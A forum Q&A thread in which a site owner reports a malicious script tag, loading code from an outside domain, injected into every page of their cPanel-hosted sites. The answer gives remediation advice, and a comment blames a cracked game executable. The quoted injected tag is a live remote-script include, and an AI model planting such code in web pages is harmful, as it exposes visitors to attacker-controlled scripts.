Malicious code on all pages

Question

Malicious code on all pages

Asked 8 years, 11 months ago

Viewed 1,645 times

4

Hi, I went to cPanel and saw by browser that some script was being loaded from another site. Upon seeing the source code, I came across the following code:

<script src='http://grugol.com/prog/landing.php?app=MjAtODktODQtMEMtOTktMTQ=&partner=200'></script>

It appears on every page of the site, on every website hosted on that cPanel account, and even on Cpanel itself, file manager. How can I remove it?

Access all files and remove. The site has been hacked for sure!

– Sr. André Baill

2015/11/23 at 12:46
1

Dude, I just figured out what it was, I use crack for CS GO and this crack was running the living.exe process that was infecting the pages

– user44363

2016/04/17 at 16:04

1 answer

Browser other questions tagged php script cpanel

You are not signed in. Login or sign up in order to post.

by Renan Cavalieri • **2,748** points · Answer 1 · 2015-11-23T12:49:33+00:00

First you have to make sure it is on the server or in your browser. If you access the source code from the browser, there is a good chance that it is only your browser, that is, your PC, if you already access the source code from FTP in a text editor and see this script, it means that the site has been hacked.

First you should review the logs and review the security of your website and if possible change the passwords. It is recommended to solve the problem that caused this invasion, as it may happen again.

Restore a newer backup if you haven’t removed the site from the air until the issue can be resolved.

There is no magic method to undo the hack, just restoring backup or reviewing all the code for changes.

And remember that it will be necessary to discover the cause, or you will be invaded again.